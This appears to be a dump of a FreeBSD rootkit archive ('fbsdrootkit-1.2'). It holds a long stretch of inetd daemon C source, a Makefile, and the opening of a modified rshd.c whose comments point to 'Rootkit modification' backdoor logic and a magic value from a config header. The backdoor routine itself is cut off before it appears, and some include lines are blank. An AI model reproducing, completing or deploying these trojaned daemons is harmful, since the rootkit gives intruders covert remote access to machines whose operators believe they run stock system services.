(debug) fprintf(stderr, "accept, ctrl %d\n", ctrl); if (ctrl < 0) { if (errno != EINTR) syslog(LOG_WARNING, "accept (for %s): %m", sep->se_service); continue; } if(log) { i = sizeof peer; if(getpeername(ctrl, (struct sockaddr *) &peer, &i)) { syslog(LOG_WARNING, "getpeername(for %s): %m", sep->se_service); continue; } syslog(LOG_INFO,"%s from %s", sep->se_service, inet_ntoa(peer.sin_addr)); } /* * Call tcpmux to find the real service to exec. */ if (sep->se_bi && sep->se_bi->bi_fn == (void (*)()) tcpmux) { struct servtab *tsep; tsep = tcpmux(ctrl); if (tsep == NULL) { close(ctrl); continue; } sep = tsep; } } else ctrl = sep->se_fd; (void) sigblock(SIGBLOCK); pid = 0; dofork = (sep->se_bi == 0 || sep->se_bi->bi_fork); if (dofork) { if (sep->se_count++ == 0) (void)gettimeofday(&sep->se_time, (struct timezone *)0); else if (sep->se_count >= toomany) { struct timeval now; (void)gettimeofday(&now, (struct timezone *)0); if (now.tv_sec - sep->se_time.tv_sec > CNT_INTVL) { sep->se_time = now; sep->se_count = 1; } else { syslog(LOG_ERR, "%s/%s server failing (looping), service terminated", sep->se_service, sep->se_proto); close_sep(sep); sigsetmask(0L); if (!timingout) { timingout = 1; alarm(RETRYTIME); } continue; } } pid = fork(); } if (pid < 0) { syslog(LOG_ERR, "fork: %m"); if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) close(ctrl); sigsetmask(0L); sleep(1); continue; } if (pid && sep->se_wait) { sep->se_wait = pid; if (sep->se_fd >= 0) { FD_CLR(sep->se_fd, &allsock); nsock--; } } sigsetmask(0L); if (pid == 0) { if (debug && dofork) setsid(); if (dofork) { if (debug) fprintf(stderr, "+ Closing from %d\n", maxsock); for (tmpint = maxsock; tmpint > 2; tmpint--) if (tmpint != ctrl) close(tmpint); } if (sep->se_bi) (*sep->se_bi->bi_fn)(ctrl, sep); else { if (debug) fprintf(stderr, "%d execl %s\n", getpid(), sep->se_server); dup2(ctrl, 0); close(ctrl); dup2(0, 1); dup2(0, 2); if ((pwd = getpwnam(sep->se_user)) == NULL) { syslog(LOG_ERR, "%s/%s: %s: No such user", 
sep->se_service, sep->se_proto, sep->se_user); if (sep->se_socktype != SOCK_STREAM) recv(0, buf, sizeof (buf), 0); _exit(1); } if (pwd->pw_uid) { if (setgid(pwd->pw_gid) < 0) { syslog(LOG_ERR, "%s: can't set gid %d: %m", sep->se_service, pwd->pw_gid); _exit(1); } (void) initgroups(pwd->pw_name, pwd->pw_gid); if (setuid(pwd->pw_uid) < 0) { syslog(LOG_ERR, "%s: can't set uid %d: %m", sep->se_service, pwd->pw_uid); _exit(1); } } execv(sep->se_server, sep->se_argv); if (sep->se_socktype != SOCK_STREAM) recv(0, buf, sizeof (buf), 0); syslog(LOG_ERR, "cannot execute %s: %m", sep->se_server); _exit(1); } } if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) close(ctrl); } } } void reapchild(signo) int signo; { int status; pid_t pid; struct servtab *sep; for (;;) { pid = wait3(&status, WNOHANG, (struct rusage *)0); if (pid <= 0) break; if (debug) fprintf(stderr, "%d reaped, status %#x\n", pid, status); for (sep = servtab; sep; sep = sep->se_next) if (sep->se_wait == pid) { if (status) syslog(LOG_WARNING, "%s: exit status 0x%x", sep->se_server, status); if (debug) fprintf(stderr, "restored %s, fd %d\n", sep->se_service, sep->se_fd); FD_SET(sep->se_fd, &allsock); nsock++; sep->se_wait = 1; } } } void config(signo) int signo; { struct servtab *sep, *cp, **sepp; struct passwd *pwd; long omask; if (!setconfig()) { syslog(LOG_ERR, "%s: %m", CONFIG); return; } for (sep = servtab; sep; sep = sep->se_next) sep->se_checked = 0; while (cp = getconfigent()) { if ((pwd = getpwnam(cp->se_user)) == NULL) { syslog(LOG_ERR, "%s/%s: No such user '%s', service ignored", cp->se_service, cp->se_proto, cp->se_user); continue; } for (sep = servtab; sep; sep = sep->se_next) if (strcmp(sep->se_service, cp->se_service) == 0 && strcmp(sep->se_proto, cp->se_proto) == 0) break; if (sep != 0) { int i; omask = sigblock(SIGBLOCK); /* * sep->se_wait may be holding the pid of a daemon * that we're waiting for. If so, don't overwrite * it unless the config file explicitly says don't * wait. 
*/ if (cp->se_bi == 0 && (sep->se_wait == 1 || cp->se_wait == 0)) sep->se_wait = cp->se_wait; #define SWAP(a, b) { char *c = a; a = b; b = c; } if (cp->se_user) SWAP(sep->se_user, cp->se_user); if (cp->se_server) SWAP(sep->se_server, cp->se_server); for (i = 0; i < MAXARGV; i++) SWAP(sep->se_argv[i], cp->se_argv[i]); sigsetmask(omask); freeconfig(cp); if (debug) print_service("REDO", sep); } else { sep = enter(cp); if (debug) print_service("ADD ", sep); } sep->se_checked = 1; if (ISMUX(sep)) { sep->se_fd = -1; continue; } if (!sep->se_rpc) { sp = getservbyname(sep->se_service, sep->se_proto); if (sp == 0) { syslog(LOG_ERR, "%s/%s: unknown service", sep->se_service, sep->se_proto); sep->se_checked = 0; continue; } if (sp->s_port != sep->se_ctrladdr.sin_port) { sep->se_ctrladdr.sin_family = AF_INET; sep->se_ctrladdr.sin_port = sp->s_port; if (sep->se_fd >= 0) close_sep(sep); } } else { rpc = getrpcbyname(sep->se_service); if (rpc == 0) { syslog(LOG_ERR, "%s/%s unknown RPC service.", sep->se_service, sep->se_proto); if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; continue; } if (rpc->r_number != sep->se_rpc_prog) { if (sep->se_rpc_prog) unregisterrpc(sep); sep->se_rpc_prog = rpc->r_number; if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; } } if (sep->se_fd == -1) setup(sep); } endconfig(); /* * Purge anything not looked at above. 
*/ omask = sigblock(SIGBLOCK); sepp = &servtab; while (sep = *sepp) { if (sep->se_checked) { sepp = &sep->se_next; continue; } *sepp = sep->se_next; if (sep->se_fd >= 0) close_sep(sep); if (debug) print_service("FREE", sep); if (sep->se_rpc && sep->se_rpc_prog > 0) unregisterrpc(sep); freeconfig(sep); free((char *)sep); } (void) sigsetmask(omask); } void unregisterrpc(sep) struct servtab *sep; { int i; struct servtab *sepp; long omask; omask = sigblock(SIGBLOCK); for (sepp = servtab; sepp; sepp = sepp->se_next) { if (sepp == sep) continue; if (sep->se_checked == 0 || !sepp->se_rpc || sep->se_rpc_prog != sepp->se_rpc_prog) continue; return; } if (debug) print_service("UNREG", sep); for (i = sep->se_rpc_lowvers; i <= sep->se_rpc_highvers; i++) pmap_unset(sep->se_rpc_prog, i); if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; (void) sigsetmask(omask); } void retry(signo) int signo; { struct servtab *sep; timingout = 0; for (sep = servtab; sep; sep = sep->se_next) if (sep->se_fd == -1) setup(sep); } void setup(sep) struct servtab *sep; { int on = 1; if ((sep->se_fd = socket(AF_INET, sep->se_socktype, 0)) < 0) { if (debug) fprintf(stderr, "socket failed on %s/%s: %s\n", sep->se_service, sep->se_proto, strerror(errno)); syslog(LOG_ERR, "%s/%s: socket: %m", sep->se_service, sep->se_proto); return; } #define turnon(fd, opt) \ setsockopt(fd, SOL_SOCKET, opt, (char *)&on, sizeof (on)) if (strcmp(sep->se_proto, "tcp") == 0 && (options & SO_DEBUG) && turnon(sep->se_fd, SO_DEBUG) < 0) syslog(LOG_ERR, "setsockopt (SO_DEBUG): %m"); if (turnon(sep->se_fd, SO_REUSEADDR) < 0) syslog(LOG_ERR, "setsockopt (SO_REUSEADDR): %m"); #undef turnon if (bind(sep->se_fd, (struct sockaddr *)&sep->se_ctrladdr, sizeof (sep->se_ctrladdr)) < 0) { if (debug) fprintf(stderr, "bind failed on %s/%s: %s\n", sep->se_service, sep->se_proto, strerror(errno)); syslog(LOG_ERR, "%s/%s: bind: %m", sep->se_service, sep->se_proto); (void) close(sep->se_fd); sep->se_fd = -1; if (!timingout) { 
timingout = 1; alarm(RETRYTIME); } return; } if (sep->se_rpc) { int i, len = sizeof(struct sockaddr); if (getsockname(sep->se_fd, (struct sockaddr*)&sep->se_ctrladdr, &len) < 0){ syslog(LOG_ERR, "%s/%s: getsockname: %m", sep->se_service, sep->se_proto); (void) close(sep->se_fd); sep->se_fd = -1; return; } if (debug) print_service("REG ", sep); for (i = sep->se_rpc_lowvers; i <= sep->se_rpc_highvers; i++) { pmap_unset(sep->se_rpc_prog, i); pmap_set(sep->se_rpc_prog, i, (sep->se_socktype == SOCK_DGRAM) ? IPPROTO_UDP : IPPROTO_TCP, ntohs(sep->se_ctrladdr.sin_port)); } } if (sep->se_socktype == SOCK_STREAM) listen(sep->se_fd, 10); FD_SET(sep->se_fd, &allsock); nsock++; if (sep->se_fd > maxsock) maxsock = sep->se_fd; if (debug) { fprintf(stderr, "registered %s on %d\n", sep->se_server, sep->se_fd); } } /* * Finish with a service and its socket. */ void close_sep(sep) struct servtab *sep; { if (sep->se_fd >= 0) { nsock--; FD_CLR(sep->se_fd, &allsock); (void) close(sep->se_fd); sep->se_fd = -1; } sep->se_count = 0; /* * Don't keep the pid of this running deamon: when reapchild() * reaps this pid, it would erroneously increment nsock. 
*/ if (sep->se_wait > 1) sep->se_wait = 1; } struct servtab * enter(cp) struct servtab *cp; { struct servtab *sep; long omask; sep = (struct servtab *)malloc(sizeof (*sep)); if (sep == (struct servtab *)0) { syslog(LOG_ERR, "Out of memory."); exit(-1); } *sep = *cp; sep->se_fd = -1; omask = sigblock(SIGBLOCK); sep->se_next = servtab; servtab = sep; sigsetmask(omask); return (sep); } FILE *fconfig = NULL; struct servtab serv; char line[LINE_MAX]; int setconfig() { if (fconfig != NULL) { fseek(fconfig, 0L, SEEK_SET); return (1); } fconfig = fopen(CONFIG, "r"); return (fconfig != NULL); } void endconfig() { if (fconfig) { (void) fclose(fconfig); fconfig = NULL; } } struct servtab * getconfigent() { struct servtab *sep = &serv; int argc; char *cp, *arg; char *versp; static char TCPMUX_TOKEN[] = "tcpmux/"; #define MUX_LEN (sizeof(TCPMUX_TOKEN)-1) more: while ((cp = nextline(fconfig)) && (*cp == '#' || *cp == '\0')) ; if (cp == NULL) return ((struct servtab *)0); /* * clear the static buffer, since some fields (se_ctrladdr, * for example) don't get initialized here. */ memset((caddr_t)sep, 0, sizeof *sep); arg = skip(&cp); if (cp == NULL) { /* got an empty line containing just blanks/tabs. 
*/ goto more; } if (strncmp(arg, TCPMUX_TOKEN, MUX_LEN) == 0) { char *c = arg + MUX_LEN; if (*c == '+') { sep->se_type = MUXPLUS_TYPE; c++; } else sep->se_type = MUX_TYPE; sep->se_service = newstr(c); } else { sep->se_service = newstr(arg); sep->se_type = NORM_TYPE; } arg = sskip(&cp); if (strcmp(arg, "stream") == 0) sep->se_socktype = SOCK_STREAM; else if (strcmp(arg, "dgram") == 0) sep->se_socktype = SOCK_DGRAM; else if (strcmp(arg, "rdm") == 0) sep->se_socktype = SOCK_RDM; else if (strcmp(arg, "seqpacket") == 0) sep->se_socktype = SOCK_SEQPACKET; else if (strcmp(arg, "raw") == 0) sep->se_socktype = SOCK_RAW; else sep->se_socktype = -1; sep->se_proto = newstr(sskip(&cp)); if (strncmp(sep->se_proto, "rpc/", 4) == 0) { sep->se_proto += 4; sep->se_rpc = 1; sep->se_rpc_prog = sep->se_rpc_lowvers = sep->se_rpc_lowvers = 0; sep->se_ctrladdr.sin_family = AF_INET; sep->se_ctrladdr.sin_port = 0; sep->se_ctrladdr.sin_addr.s_addr = htonl(INADDR_ANY); if ((versp = rindex(sep->se_service, '/'))) { *versp++ = '\0'; switch (sscanf(versp, "%d-%d", &sep->se_rpc_lowvers, &sep->se_rpc_highvers)) { case 2: break; case 1: sep->se_rpc_highvers = sep->se_rpc_lowvers; break; default: syslog(LOG_ERR, "bad RPC version specifier; %s\n", sep->se_service); freeconfig(sep); goto more; } } else { sep->se_rpc_lowvers = sep->se_rpc_highvers = 1; } } arg = sskip(&cp); sep->se_wait = strcmp(arg, "wait") == 0; if (ISMUX(sep)) { /* * Silently enforce "nowait" for TCPMUX services since * they don't have an assigned port to listen on. 
*/ sep->se_wait = 0; if (strcmp(sep->se_proto, "tcp")) { syslog(LOG_ERR, "%s: bad protocol for tcpmux service %s", CONFIG, sep->se_service); goto more; } if (sep->se_socktype != SOCK_STREAM) { syslog(LOG_ERR, "%s: bad socket type for tcpmux service %s", CONFIG, sep->se_service); goto more; } } sep->se_user = newstr(sskip(&cp)); sep->se_server = newstr(sskip(&cp)); if (strcmp(sep->se_server, "internal") == 0) { struct biltin *bi; for (bi = biltins; bi->bi_service; bi++) if (bi->bi_socktype == sep->se_socktype && strcmp(bi->bi_service, sep->se_service) == 0) break; if (bi->bi_service == 0) { syslog(LOG_ERR, "internal service %s unknown", sep->se_service); goto more; } sep->se_bi = bi; sep->se_wait = bi->bi_wait; } else sep->se_bi = NULL; argc = 0; for (arg = skip(&cp); cp; arg = skip(&cp)) if (argc < MAXARGV) sep->se_argv[argc++] = newstr(arg); while (argc <= MAXARGV) sep->se_argv[argc++] = NULL; return (sep); } void freeconfig(cp) struct servtab *cp; { int i; if (cp->se_service) free(cp->se_service); if (cp->se_proto) free(cp->se_proto); if (cp->se_user) free(cp->se_user); if (cp->se_server) free(cp->se_server); for (i = 0; i < MAXARGV; i++) if (cp->se_argv[i]) free(cp->se_argv[i]); } /* * Safe skip - if skip returns null, log a syntax error in the * configuration file and exit. 
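*/
char *
sskip(cpp)
	char **cpp;
{
	char *field = skip(cpp);

	if (field == NULL) {
		/* A field that must be present is missing: fatal. */
		syslog(LOG_ERR, "%s: syntax error", CONFIG);
		exit(-1);
	}
	return (field);
}

/*
 * skip -- split the next blank/tab-delimited field off *cpp.
 *
 * Leading blanks and tabs are skipped, the field is NUL-terminated in
 * place, *cpp is advanced past it and a pointer to the start of the
 * field is returned.  When the current line is exhausted, the next
 * character of fconfig is peeked: if it is a blank or tab the following
 * line is read with nextline() and parsing resumes there (continuation
 * line); otherwise *cpp is set to NULL and NULL is returned.
 */
char *
skip(cpp)
	char **cpp;
{
	char *cp = *cpp;
	char *start;

again:
	while (*cp == ' ' || *cp == '\t')
		cp++;
	if (*cp == '\0') {
		int c;

		/* Peek at the next character without consuming it. */
		c = getc(fconfig);
		(void) ungetc(c, fconfig);
		if (c == ' ' || c == '\t')
			if ((cp = nextline(fconfig)) != NULL)
				goto again;
		*cpp = (char *)0;
		return ((char *)0);
	}
	start = cp;
	while (*cp && *cp != ' ' && *cp != '\t')
		cp++;
	if (*cp != '\0')
		*cp++ = '\0';
	*cpp = cp;
	return (start);
}

/*
 * nextline -- read one line from fd into the file-scope buffer `line',
 * strip the trailing newline if one is present, and return `line'.
 * Returns NULL when fgets() does.
 */
char *
nextline(fd)
	FILE *fd;
{
	char *nl;

	if (fgets(line, sizeof (line), fd) == NULL)
		return ((char *)0);
	nl = strchr(line, '\n');
	if (nl)
		*nl = '\0';
	return (line);
}

/*
 * newstr -- return a strdup() copy of cp, or of "" when cp is NULL.
 * If strdup() fails the error is logged and the process exits, so
 * callers never see a NULL return.
 */
char *
newstr(cp)
	char *cp;
{
	char *copy = strdup(cp ? cp : "");

	if (copy != NULL)
		return (copy);
	syslog(LOG_ERR, "strdup: %m");
	exit(-1);
}

/*
 * setproctitle -- overwrite the argument area that starts at Argv[0]
 * and ends at LastArg with "-<a> [<peer address>]", or with "-<a>"
 * when getpeername() on s fails, and pad the rest with blanks.
 *
 * The title is formatted with snprintf() so that a service name longer
 * than buf is truncated instead of written past the end of buf.
 */
void
setproctitle(a, s)
	char *a;
	int s;
{
	int size;
	char *cp;
	struct sockaddr_in sin;
	char buf[80];
	size_t room, n;

	cp = Argv[0];
	size = sizeof(sin);
	if (getpeername(s, (struct sockaddr *)&sin, &size) == 0)
		(void) snprintf(buf, sizeof(buf), "-%s [%s]", a,
		    inet_ntoa(sin.sin_addr));
	else
		(void) snprintf(buf, sizeof(buf), "-%s", a);

	if (cp >= LastArg)
		return;			/* no room to write a title */
	room = (size_t)(LastArg - cp);
	n = strlen(buf);
	if (n > room)
		n = room;		/* never write at or beyond LastArg */
	memcpy(cp, buf, n);
	cp += n;
	while (cp < LastArg)
		*cp++ = ' ';
}

/*
 * Internet services provided internally by inetd:
 */
#define	BUFSIZE	8192

/* ARGSUSED */
void
echo_stream(s, sep)		/* Echo service -- echo data back */
	int s;
	struct servtab *sep;
{
	char buffer[BUFSIZE];
	int i;

	setproctitle(sep->se_service, s);
	/* Copy until read() reports EOF/error or write() fails. */
	while ((i = read(s, buffer, sizeof(buffer))) > 0 &&
	    write(s, buffer, i) > 0)
		;
	exit(0);
}

/*
 * check_loop -- refuse a datagram whose source port equals the bound
 * port of any built-in datagram service in servtab.
 *
 * Returns 1 (after logging a warning that names both services and the
 * sender's address) when such a match is found, 0 otherwise.
 *
 * NOTE(review): only the source port is inspected; the source address
 * is not validated here.
 */
int
check_loop(sin, sep)
	struct sockaddr_in *sin;
	struct servtab *sep;
{
	struct servtab *se2;

	for (se2 = servtab; se2; se2 = se2->se_next) {
		/* Only built-in datagram services are considered. */
		if (!se2->se_bi || se2->se_socktype != SOCK_DGRAM)
			continue;

		if (sin->sin_port == se2->se_ctrladdr.sin_port) {
			syslog(LOG_WARNING,
			    "%s/%s:%s/%s loop request REFUSED from %s",
			    sep->se_service, sep->se_proto,
			    se2->se_service, se2->se_proto,
			    inet_ntoa(sin->sin_addr));
			return 1;
		}
	}
	return 0;
}

/* ARGSUSED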
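*/
/*
 * echo_dg: read one datagram from s and send it back to its sender.
 *
 * The reply goes to whatever source address the datagram carries, and
 * that address is not authenticated.  check_loop() only refuses source
 * ports that belong to our own built-in datagram services.
 */
void
echo_dg(s, sep)         /* Echo service -- echo data back */
    int s;
    struct servtab *sep;
{
    char buffer[BUFSIZE];
    int i, size;
    struct sockaddr_in sin;

    size = sizeof(sin);
    i = recvfrom(s, buffer, sizeof(buffer), 0,
        (struct sockaddr *)&sin, &size);
    if (i < 0)
        return;

    if (check_loop(&sin, sep))
        return;

    (void) sendto(s, buffer, i, 0, (struct sockaddr *)&sin,
        sizeof(sin));
}

/* ARGSUSED */
/*
 * discard_stream: read and throw away everything on s, restarting the
 * read after EINTR, then exit on end of file or any other error.
 */
void
discard_stream(s, sep)      /* Discard service -- ignore data */
    int s;
    struct servtab *sep;
{
    int ret;
    char buffer[BUFSIZE];

    setproctitle(sep->se_service, s);
    for (;;) {
        do {
            ret = read(s, buffer, sizeof(buffer));
        } while (ret > 0);
        if (ret == 0 || errno != EINTR)
            break;
    }
    exit(0);
}

/* ARGSUSED */
/* discard_dg: consume one datagram from s and ignore it. */
void
discard_dg(s, sep)      /* Discard service -- ignore data */
    int s;
    struct servtab *sep;
{
    char buffer[BUFSIZE];

    (void) read(s, buffer, sizeof(buffer));
}

#include <ctype.h>
#define LINESIZ 72
char ring[128];
char *endring;

/*
 * initring: fill ring[] with the printable characters among the codes
 * 0..127 and leave endring one past the last one stored.
 *
 * The loop is bounded by the size of ring[].  The original ran to 128
 * inclusive, which is one more candidate than the array has slots.
 */
void
initring()
{
    int i;

    endring = ring;

    for (i = 0; i < (int)sizeof(ring); ++i)
        if (isprint(i))
            *endring++ = i;
}

/* ARGSUSED */
/*
 * chargen_stream: write an endless sequence of LINESIZ-character lines,
 * each ending in "\r\n" and each starting one position further into the
 * ring, until a write() fails or is short; then exit.
 */
void
chargen_stream(s, sep)      /* Character generator */
    int s;
    struct servtab *sep;
{
    int len;
    char *rs, text[LINESIZ+2];

    setproctitle(sep->se_service, s);

    if (!endring)
        initring();

    text[LINESIZ] = '\r';
    text[LINESIZ + 1] = '\n';
    for (rs = ring;;) {
        len = endring - rs;
        if (len >= LINESIZ)
            memmove(text, rs, LINESIZ);
        else {
            /* Wrap around: tail of the ring, then its head. */
            memmove(text, rs, len);
            memmove(text + len, ring, LINESIZ - len);
        }
        if (++rs == endring)
            rs = ring;
        if (write(s, text, sizeof(text)) != sizeof(text))
            break;
    }
    exit(0);
}

/* ARGSUSED */
/*
 * chargen_dg: answer one datagram with one LINESIZ+2 byte line of the
 * character pattern; the static rs keeps the position between calls.
 *
 * The reply has a fixed size whatever the size of the request, and it is
 * sent to the unauthenticated source address of the request.  Operators
 * who do not need this service should leave it disabled in the
 * configuration.
 */
void
chargen_dg(s, sep)      /* Character generator */
    int s;
    struct servtab *sep;
{
    struct sockaddr_in sin;
    static char *rs;
    int len, size;
    char text[LINESIZ+2];

    if (endring == 0) {
        initring();
        rs = ring;
    }

    size = sizeof(sin);
    if (recvfrom(s, text, sizeof(text), 0,
        (struct sockaddr *)&sin, &size) < 0)
        return;

    if (check_loop(&sin, sep))
        return;

    len = endring - rs;
    if (len >= LINESIZ)
        memmove(text, rs, LINESIZ);
    else {
        memmove(text, rs, len);
        memmove(text + len, ring, LINESIZ - len);
    }
    if (++rs == endring)
        rs = ring;
    text[LINESIZ] = '\r';
    text[LINESIZ + 1] = '\n';
    (void) sendto(s, text, sizeof(text), 0,
        (struct sockaddr *)&sin, sizeof(sin));
}

/*
 * Return a machine readable date and time, in the form of the
 * number of seconds since midnight, Jan 1, 1900.  Since gettimeofday
 * returns the number of seconds since midnight, Jan 1, 1970,
 * we must add 2208988800 seconds to this figure to make up for
 * some seventy years Bell Labs was asleep.
 *
 * The value is returned in network byte order; 0 is returned when
 * gettimeofday() fails.
 */
long
machtime()
{
    struct timeval tv;

    if (gettimeofday(&tv, (struct timezone *)0) < 0) {
        if (debug)
            fprintf(stderr, "Unable to get time of day\n");
        return (0L);
    }
#define OFFSET ((u_long)25567 * 24*60*60)
    return (htonl((long)(tv.tv_sec + OFFSET)));
#undef OFFSET
}

/* ARGSUSED */
/*
 * machtime_stream: write the machtime() value to s.
 * NOTE(review): sizeof(long) bytes are written; that is 4 only where
 * long is 32 bits wide.
 */
void
machtime_stream(s, sep)
    int s;
    struct servtab *sep;
{
    long result;

    result = machtime();
    (void) write(s, (char *) &result, sizeof(result));
}

/* ARGSUSED */
/*
 * machtime_dg: answer one datagram with the machtime() value.  The
 * request payload is read into `result` only to consume the datagram.
 */
void
machtime_dg(s, sep)
    int s;
    struct servtab *sep;
{
    long result;
    struct sockaddr_in sin;
    int size;

    size = sizeof(sin);
    if (recvfrom(s, (char *)&result, sizeof(result), 0,
        (struct sockaddr *)&sin, &size) < 0)
        return;

    if (check_loop(&sin, sep))
        return;

    result = machtime();
    (void) sendto(s, (char *) &result, sizeof(result), 0,
        (struct sockaddr *)&sin, sizeof(sin));
}

/* ARGSUSED */
/* daytime_stream: write the ctime() text of the current time plus "\r\n". */
void
daytime_stream(s, sep)      /* Return human-readable time of day */
    int s;
    struct servtab *sep;
{
    char buffer[256];
    time_t clock;

    clock = time((time_t *) 0);

    (void) snprintf(buffer, sizeof(buffer), "%.24s\r\n", ctime(&clock));
    (void) write(s, buffer, strlen(buffer));
}

/* ARGSUSED */
/*
 * daytime_dg: answer one datagram with the ctime() text of the current
 * time plus "\r\n".  The request payload is read and ignored.
 */
void
daytime_dg(s, sep)      /* Return human-readable time of day */
    int s;
    struct servtab *sep;
{
    char buffer[256];
    time_t clock;
    struct sockaddr_in sin;
    int size;

    clock = time((time_t *) 0);

    size = sizeof(sin);
    if (recvfrom(s, buffer, sizeof(buffer), 0,
        (struct sockaddr *)&sin, &size) < 0)
        return;

    if (check_loop(&sin, sep))
        return;

    (void) snprintf(buffer, sizeof(buffer), "%.24s\r\n", ctime(&clock));
    (void) sendto(s, buffer, strlen(buffer), 0,
        (struct sockaddr *)&sin, sizeof(sin));
}

/*
 * print_service:
 *  Dump relevant information to stderr
 *
 * The original tested sep->se_rpc and then printed the same format with
 * the same arguments in both branches, so one call is enough.
 */
void
print_service(action, sep)
    char *action;
    struct servtab *sep;
{
    fprintf(stderr,
        "%s: %s proto=%s, wait=%d, user=%s builtin=%x server=%s\n",
        action, sep->se_service, sep->se_proto,
        sep->se_wait, sep->se_user, (int)sep->se_bi, sep->se_server);
}

/*
 *  Based on TCPMUX.C by Mark K. Lottor November 1988
 *  sri-nic::ps:tcpmux.c
 */

/*
 * getline: read from fd into buf until '\r', '\n' or '\0' is seen, until
 * len characters are stored, or until end of file.  Returns the number
 * of characters before the terminator, or -1 when read() fails.  The
 * buffer is not NUL-terminated here; the caller does that.
 */
static int      /* # of characters up to \r,\n or \0 */
getline(fd, buf, len)
    int fd;
    char *buf;
    int len;
{
    int count = 0, n;

    do {
        n = read(fd, buf, len-count);
        if (n == 0)
            return (count);
        if (n < 0)
            return (-1);
        while (--n >= 0) {
            if (*buf == '\r' || *buf == '\n' || *buf == '\0')
                return (count);
            count++;
            buf++;
        }
    } while (count < len);
    return (count);
}

#define MAX_SERV_LEN    (256+2)     /* 2 bytes for \r\n */

#define strwrite(fd, buf)   (void) write(fd, buf, sizeof(buf)-1)

/*
 * tcpmux: read a service name from s and return the matching servtab
 * entry, or NULL after writing a "-" reply (or the "help" listing) to
 * the client.  Only entries for which ISMUX() is true are considered;
 * the comparison ignores case.  The name comes straight from the
 * network: it is bounded by MAX_SERV_LEN and terminated here.
 */
struct servtab *
tcpmux(s)
    int s;
{
    struct servtab *sep;
    char service[MAX_SERV_LEN+1];
    int len;

    /* Get requested service name */
    if ((len = getline(s, service, MAX_SERV_LEN)) < 0) {
        strwrite(s, "-Error reading service name\r\n");
        return (NULL);
    }
    service[len] = '\0';

    if (debug)
        fprintf(stderr, "tcpmux: someone wants %s\n", service);

    /*
     * Help is a required command, and lists available services,
     * one per line.
     */
    if (!strcasecmp(service, "help")) {
        for (sep = servtab; sep; sep = sep->se_next) {
            if (!ISMUX(sep))
                continue;
            (void)write(s,sep->se_service,strlen(sep->se_service));
            strwrite(s, "\r\n");
        }
        return (NULL);
    }

    /* Try matching a service in inetd.conf with the request */
    for (sep = servtab; sep; sep = sep->se_next) {
        if (!ISMUX(sep))
            continue;
        if (!strcasecmp(service, sep->se_service)) {
            if (ISMUXPLUS(sep)) {
                strwrite(s, "+Go\r\n");
            }
            return (sep);
        }
    }
    strwrite(s, "-Service not available\r\n");
    return (NULL);
}
fbsdrootkit-1.2/rshd/ 40700 764 0 0 6256133407 12313 5ustar dfrootfbsdrootkit-1.2/rshd/Makefile100600 764 0 543 5663754640 14045 0ustar dfroot# From: @(#)Makefile 8.1 (Berkeley) 6/4/93 # $Id: Makefile,v 1.4 1994/11/20 23:20:00 wollman Exp $ PROG= rshd SRCS= rshd.c MAN8= rshd.8 .if exists(${DESTDIR}/usr/lib/libkrb.a) && (defined(MAKE_KERBEROS) \ || defined(MAKE_EBONES)) CFLAGS+=-DKERBEROS -DCRYPT DPADD= ${LIBKRB} ${LIBDES} LDADD= -lkrb -ldes DISTRIBUTION= krb .endif .include fbsdrootkit-1.2/rshd/rshd.c100600 764 0 43766 6256134455 13562 0ustar dfroot/*- * Copyright (c) 1988, 1989, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. 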
Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1988, 1989, 1992, 1993, 1994\n\ The Regents of the University of California. 
All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)rshd.c 8.2 (Berkeley) 4/6/94";
#endif /* not lint */

/*
 * remote shell server:
 *  [port]\0
 *  remuser\0
 *  locuser\0
 *  command\0
 *  data
 */
/*
 * NOTE(review): this copy of rshd.c differs from the stock source that
 * the same archive carries as rshd.c.dist.  The differences are the
 * include of ../config.h and, in doit(), the MAG/werd logic; they are
 * marked "Rootkit modification" below.
 *
 * NOTE(review): the header names after the #include directives are
 * missing on this page, apparently lost in extraction.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Rootkit configuration files */
/* Rootkit modification: presumably supplies ROOTKIT_MAGIC -- not visible here. */
#include "../config.h"

int keepalive = 1;      /* cleared by -n */
int check_all;          /* set by -a */
int log_success;        /* If TRUE, log all successful accesses */
int sent_null;          /* set once doit() has written the NUL status byte */

void     doit __P((struct sockaddr_in *));
void     error __P((const char *, ...));
void     getstr __P((char *, int, char *));
int  local_domain __P((char *));
char    *topdomain __P((char *));
void     usage __P((void));

#ifdef  KERBEROS
#include
#include
#define VERSION_SIZE    9
#define SECURE_MESSAGE  "This rsh session is using DES encryption for all transmissions.\r\n"
#define OPTIONS     "alnkvxL"
